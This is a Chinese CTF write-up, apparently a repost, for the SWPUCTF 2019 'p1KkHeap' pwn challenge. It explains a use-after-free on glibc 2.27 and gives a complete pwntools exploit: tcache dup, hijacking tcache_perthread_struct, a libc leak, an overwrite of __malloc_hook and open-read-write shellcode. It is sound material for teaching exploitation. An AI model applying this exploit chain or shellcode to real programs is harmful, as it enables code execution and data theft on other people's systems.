当前位置: 开发笔记 > 编程语言 > 正文

SWPUCTF_2019_p1KkHeap

作者：mobiledu2502871951 | 来源：互联网 | 2023-08-15 21:05

SWPUCTF_2019_p1KkHeap总结根据本题，学习与收获有：tcacheattack时如果可以利用tcache_perthread_struct，优先考虑利用这个结构体，

SWPUCTF_2019_p1KkHeap
- 总结
- 题目分析
  - checksec
  - 函数分析
    - main
    - set_prctl
    - menu
    - add_note
    - show_note
    - edit_note
    - del_note
  - 漏洞点
- 利用思路
  - 知识点
  - 利用过程
- EXP
  - 调试过程
  - 完整exp

SWPUCTF_2019_p1KkHeap

总结

根据本题，学习与收获有：

tcache attack时如果可以利用tcache_perthread_struct，优先考虑利用这个结构体，可以省去很多麻烦。控制了这个结构体，相当于就控制了malloc的分配，可以控制tcache bins中chunk的数量和分配地址。

tcache_perthread_struct结构体在堆上，大小一般为0x250。它的前64个字节，分别代表0x20~0x410大小的chunk(包括chunk头)的数量。当超过7的时候，再次释放的chunk会被放入到fastbin或者unsorted bin。后面的内存，则分别表示0x20~0x410大小tcache bins的首地址。

如图所示：

技术分享图片

然后看一下内部细节：

技术分享图片

首地址如果是一个有效的地址，下一次分配对应大小的chunk会直接从该地址处分配，没有chunk size的检查。

tcache attack可以重复释放，可以直接修改tcache entry的值，没有chunk size的检查。

题目分析

checksec

技术分享图片

保护全开！

函数分析

很明显，又是一个菜单题。首先来看main函数。

main

技术分享图片

这些函数的名字我都修改过。然后看一下这个set_prctl到底干了啥：

set_prctl

技术分享图片

同时，结合seccomp-tools查看一下禁用了哪些系统调用：

技术分享图片

不能执行execve系统调用。那么结合前面的mmap，猜测可以控制程序执行流到0x66660000处，提前在这里写好shellcode，通过orw的方式读取flag。

继续往下分析函数。

技术分享图片

add_note

技术分享图片

size的大小只能控制在0x100以内，最多执行该函数7次。

show_note

技术分享图片

edit_note

技术分享图片

del_note

技术分享图片

可以看到，只能free三次，且存储内存指针的数组没有置为空。

漏洞点

程序的运行环境为ubuntu 18.04，libc的版本为2.27，有tcache bin机制。可以很明显的看到，在del_note函数中有一个UAF的漏洞。但是，最多只能free3次。结合tcache dup的利用手段，tcache bin连续两次释放，并不会crash，而会造成这个链表自己指向自己。这样，连续分配三次后，可以在任意地址分配chunk。

mmap分配的内存具有可读可写可执行的权限，所以可以往这上面写shellcode，然后劫持malloc_hook到地址0x66660000，跳转执行shellcode。注意，不能包含execve的系统调用，所以只能写orw的shellcode。

利用思路

知识点

如上面所说，每一个线程都会维护一个结构体，名为tcache_perthread_struct，这个结构体负责tcache in chunk的分配。所以，只要控制住这个结构体，就能实现控制任意大小的tcache bin chunk的任意地址的分配。

当tcache bins放满7个后，剩余free掉的chunk会被放到fastbin或者unsorted bin。这里判断对应带大小的tcache bins的方法，就是检查tcache_perthread_struct中的字段的大小是不是大于6。

calloc不会从tcache bin中取chunk，但是如果对应大小的tcache bin未满7个的话，会把对应大小的fastbin或者small bin以头插法的形式，插入到tcache bin中。也就是说，如果修改了fd/bk指针，可以往任意一个地方写一个libc地址。（这个知识点可能用不到，不过可以先总结一下。）

利用过程

这里采取劫持tcache_perthread_struct，然后通过控制对应大小的tcache bin的数量，使得下一次释放的chunk被放置在unsorted bin中。，从而泄露出libc的地址，根据偏移计算出malloc_hook的地址。

步骤：

连续申请两块大小为0x100大小的chunk 0和chunk 1

连续释放两次chunk 1

通过show功能打印出堆地址，进而泄露出tcache_perthread_struct的地址，并分配到这里

修改0x100大小的tcache bin的首地址为0x66660000和个数为0

分配到0x66660000处，写入shellcode

释放chunk 0，此时chunk 0会进入到unsorted bin，利用show功能打印出libc地址

再次控制tcache_perthread_struct，分配到malloc_hook处，写入0x66660000

任意执行一次add_note即可打印出flag

EXP

调试过程

我们就按照上面所说的这个利用思路来进行调试。

定义好相关的函数：

def add_note(size:int): global io io.sendlineafter("Your Choice: ", ‘1‘) io.sendlineafter("size: ", str(size)) io.recvuntil("Done!\n") def show_note(idx:int): global io io.sendlineafter("Your Choice: ", ‘2‘) io.sendlineafter("id: ", str(idx)) msg = io.recvline() leak_addr = msg[9:15] leak_addr = u64(leak_addr.ljust(8, b‘\x00‘)) LOG_ADDR(‘leak_addr‘, leak_addr) io.recvuntil("Done!\n") return leak_addr def edit_note(idx:int, content:bytes=b‘a‘): global io io.sendlineafter("Your Choice: ", ‘3‘) io.sendlineafter("id: ", str(idx)) io.sendafter("content: ", content) io.recvuntil("Done!\n") def del_note(idx:int): global io io.sendlineafter("Your Choice: ", ‘4‘) io.sendlineafter("id: ", str(idx)) io.recvuntil("Done!\n")

首先执行两次add_note

add_note(0x100) # 0 add_note(0x100) # 1

技术分享图片

然后，执行tcache dup：

del_note(1) del_note(1)

技术分享图片

然后泄露出地址，并分配到tcache_perthread_struct

# get heap addr heap_addr = show_note(1) tcache_struct = heap_addr - 0x360 add_note(0x100) # 2 edit_note(2, p64(tcache_struct) * 2) add_note(0x100) # 3 add_note(0x100) # 4 tcache struct

技术分享图片

可以看到，0x100大小的chunk的count变成了-1

分配到0x66660000

edit_note(4, 0xb8 * b‘\x00‘ + p64(0x66660000)) # 0x66660000 chunk add_note(0x100) # 5

技术分享图片

写入shellcode到0x66660000

shellcode = shellcraft.open(‘flag‘, 0) shellcode += shellcraft.read(3, 0x66660300, 0x30) shellcode += shellcraft.write(1, 0x66660300, 0x30) edit_note(5, asm(shellcode))

技术分享图片

泄露libc地址，并且计算出malloc_hook地址

del_note(0) main_arena_96 = show_note(0) malloc_hook = main_arena_96 - 0x70

技术分享图片

分配到malloc_hook，写入0x66660000，并执行一次add_note

add_note(0x100) # 6 edit_note(6, p64(0x66660000)) io.sendlineafter("Your Choice: ", ‘1‘) io.sendlineafter("size: ", str(100))

技术分享图片

最后远程打的结果：

技术分享图片

完整exp

from pwn import * context.update(arch=‘amd64‘, os=‘linux‘, endian=‘little‘) io = process(‘./pwn‘) def add_note(size:int): global io io.sendlineafter("Your Choice: ", ‘1‘) io.sendlineafter("size: ", str(size)) io.recvuntil("Done!\n") def show_note(idx:int): global io io.sendlineafter("Your Choice: ", ‘2‘) io.sendlineafter("id: ", str(idx)) msg = io.recvline() leak_addr = msg[9:15] leak_addr = u64(leak_addr.ljust(8, b‘\x00‘)) LOG_ADDR(‘leak_addr‘, leak_addr) io.recvuntil("Done!\n") return leak_addr def edit_note(idx:int, content:bytes=b‘a‘): global io io.sendlineafter("Your Choice: ", ‘3‘) io.sendlineafter("id: ", str(idx)) io.sendafter("content: ", content) io.recvuntil("Done!\n") def del_note(idx:int): global io io.sendlineafter("Your Choice: ", ‘4‘) io.sendlineafter("id: ", str(idx)) io.recvuntil("Done!\n") # tcache bin dup add_note(0x100) # 0 add_note(0x100) # 1 del_note(1) del_note(1) # get heap addr heap_addr = show_note(1) tcache_struct = heap_addr - 0x360 add_note(0x100) # 2 edit_note(2, p64(tcache_struct) * 2) add_note(0x100) # 3 add_note(0x100) # 4 tcache struct LOG_ADDR(‘tcache_struct‘, tcache_struct) edit_note(4, 0xb8 * b‘\x00‘ + p64(0x66660000)) # 0x66660000 chunk add_note(0x100) # 5 shellcode = shellcraft.open(‘flag‘, 0) shellcode += shellcraft.read(3, 0x66660300, 0x30) shellcode += shellcraft.write(1, 0x66660300, 0x30) edit_note(5, asm(shellcode)) # leak libc_addr del_note(0) main_arena_96 = show_note(0) malloc_hook = main_arena_96 - 0x70 LOG_ADDR(‘malloc_hook‘, malloc_hook) edit_note(4, 0xb8 * b‘\x00‘ + p64(malloc_hook)) add_note(0x100) # 6 edit_note(6, p64(0x66660000)) io.sendlineafter("Your Choice: ", ‘1‘) io.sendlineafter("size: ", str(100)) io.interactive()

推荐阅读

go
MySQL查询执行流程详解

MySQL的查询执行流程涉及多个关键组件，包括连接器、查询缓存、分析器和优化器。在服务层，连接器负责建立与客户端的连接，查询缓存用于存储和检索常用查询结果，以提高性能。分析器则解析SQL语句，生成语法树，而优化器负责选择最优的查询执行计划。这一流程确保了MySQL能够高效地处理各种复杂的查询请求。 ... [详细]

蜡笔小新 2024-11-11 16:48:32
instance
SoundPool

如果应用程序经常播放密集、急促而又短暂的音效（如游戏音效）那么使用MediaPlayer显得有些不太适合了。因为MediaPlayer存在如下缺点：1)延时时间较长，且资源占用率高 ... [详细]

蜡笔小新 2024-11-13 16:47:19
instance
网络爬虫的规范与限制

本文探讨了网络爬虫引发的问题及其解决方案，重点介绍了Robots协议的作用和使用方法，旨在为网络爬虫的合理使用提供指导。 ... [详细]

蜡笔小新 2024-11-13 15:45:41
controller
AngularJS $compile 详解

本文介绍了 AngularJS 中的 $compile 服务及其用法，通过示例代码展示了如何使用 $compile 动态编译和链接 HTML 元素。 ... [详细]

蜡笔小新 2024-11-13 15:34:47
controller
[c++基础]STL

cppfig15_10.cppincludeincludeusingnamespacestd;templatevoidprintVector(constvector&integer ... [详细]

蜡笔小新 2024-11-13 13:22:43
controller
ZooKeeper 入门指南

本文将详细介绍ZooKeeper的工作机制、特点、数据结构以及常见的应用场景，包括统一命名服务、统一配置管理、统一集群管理、服务器动态上下线和软负载均衡。 ... [详细]

蜡笔小新 2024-11-13 13:11:46
get
自动验证时页面显示问题的解决方法

在使用自动验证功能时，页面未能正确显示错误信息。通过使用 `dump($info->getError())` 可以帮助诊断和解决问题。 ... [详细]

蜡笔小新 2024-11-13 12:30:21
get
解决DNS服务器配置转发无法解析的问题

本文详细介绍了如何解决DNS服务器配置转发无法解析的问题，包括编辑主配置文件和重启域名服务的具体步骤。 ... [详细]

蜡笔小新 2024-11-13 02:41:19
get
数字资产交易平台量化交易系统开发

数字资产量化交易通过大数据分析，以客观的方式制定交易决策，有效减少人为的主观判断和情绪影响。本文介绍了几种常见的数字资产量化交易策略，包括搬砖套利和趋势交易，并探讨了量化交易软件的开发前景。 ... [详细]

蜡笔小新 2024-11-12 21:49:55
post
网站访问全流程解析

本文详细介绍了从用户在浏览器中输入一个域名（如www.yy.com）到页面完全展示的整个过程，包括DNS解析、TCP连接、请求响应等多个步骤。 ... [详细]

蜡笔小新 2024-11-12 18:13:16
post
装饰者模式（Decorator）：一种灵活的对象结构设计模式

装饰者模式（Decorator）是一种灵活的对象结构设计模式，旨在为单个对象动态地添加功能，而无需修改原有类的结构。通过封装对象并提供额外的行为，装饰者模式比传统的继承方式更加灵活和可扩展。例如，可以在运行时为特定对象添加边框或滚动条等特性，而不会影响其他对象。这种模式特别适用于需要在不同情况下动态组合功能的场景。 ... [详细]

蜡笔小新 2024-11-11 16:36:53
post
【Python 实战：汇率转换器 v1.02】

本项目通过Python编程实现了一个简单的汇率转换器v1.02。主要内容包括：1. Python的基本语法元素：（1）缩进：用于表示代码的层次结构，是Python中定义程序框架的唯一方式；（2）注释：提供开发者说明信息，不参与实际运行，通常每个代码块添加一个注释；（3）常量和变量：用于存储和操作数据，是程序执行过程中的重要组成部分。此外，项目还涉及了函数定义、用户输入处理和异常捕获等高级特性，以确保程序的健壮性和易用性。 ... [详细]

蜡笔小新 2024-11-11 16:34:26
instance
Autofac高级应用实例解析

本文详细解析了Autofac在高级应用场景中的具体实现，特别是如何通过注册泛型接口的类来优化依赖注入。示例代码展示了如何使用 `builder.RegisterAssemblyTypes` 方法，结合 `typeof(IEventHandler).Assembly` 和 `Where` 过滤条件，动态注册所有符合条件的类，从而简化配置并提高代码的可维护性。此外，文章还探讨了这一方法在复杂系统中的实际应用及其优势。 ... [详细]

蜡笔小新 2024-11-11 15:48:02
instance
华为云对象存储系统配置指南

本指南详细介绍了如何利用华为云对象存储服务构建视频点播（VoD）平台。通过结合开源技术如Ceph、WordPress、PHP和Nginx，用户可以高效地实现数据存储、内容管理和网站搭建。主要内容涵盖华为云对象存储系统的配置步骤、性能优化及安全设置，为开发者提供全面的技术支持。 ... [详细]

蜡笔小新 2024-11-11 14:29:52
instance
VS2019 在创建 Windows 恢复点时出现卡顿问题及解决方法

在使用 Visual Studio 2019 时，有时会在创建 Windows 恢复点时遇到卡顿问题。这可能是由于频繁的自动更新导致的，每次更新文件大小可能达到 1-2GB。尽管现代网络速度较快，但这些更新仍可能对系统性能产生影响。本文将探讨该问题的原因，并提供有效的解决方法，帮助用户提升开发效率。 ... [详细]

蜡笔小新 2024-11-11 13:52:39